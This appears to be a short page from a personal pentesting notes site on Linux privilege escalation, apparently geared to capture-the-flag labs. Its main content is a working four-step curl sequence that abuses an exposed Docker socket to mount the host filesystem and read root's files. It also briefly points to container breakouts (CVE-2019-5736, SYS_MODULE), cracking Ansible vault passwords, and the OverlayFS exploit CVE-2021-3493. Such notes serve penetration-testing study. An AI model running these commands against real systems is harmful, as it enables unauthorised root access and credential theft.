xct's notes
Search…
Linux

Exposed Docker Socket

1
1) curl -i -s -k -X 'POST' -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "188a2704d8b0","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' http://localhost/containers/create --unix-socket /var/run/docker.sock
2
2) curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<container_id>/start
3
3) curl -i -s -X POST -H "Content-Type: application/json" --data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/hostos/root/root.txt"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' http://localhost/containers/<container_id>/exec --unix-socket /var/run/docker.sock
4
4) curl -i -s -X POST -H 'Content-Type: application/json' --data-binary '{"Detach": false,"Tty": false}' http://localhost/exec/<exec_id>/start --unix-socket /var/run/docker.sock
Copied!

Docker Exec

If you have a low privileged user and can do sudo docker exec ... chances are you can use CVE-2019-5736 (Ubuntu 18.04, Debian 9) to escalate to root on the host. Modify main.go with your payload and execute in the container. Then do another sudo docker exec ... to trigger it.

Docker Escape using SYS_MODULE cap

Abusing SYS_MODULE capability to perform Docker container breakout
Medium

Ansible Credentials

Find & check "ansible.yml". Encrypted password can be converted with "ansible2john" and then decrypted:
1
cat pw.txt | ansible-vault decrypt
Copied!

Ubuntu 20.04 OverlayFS Exploit CVE-2021-3493

Should work on most Ubuntus not patched after March 2021, tested on 4.15.0-132-generic #136-Ubuntu.

Resources

Last modified 7mo ago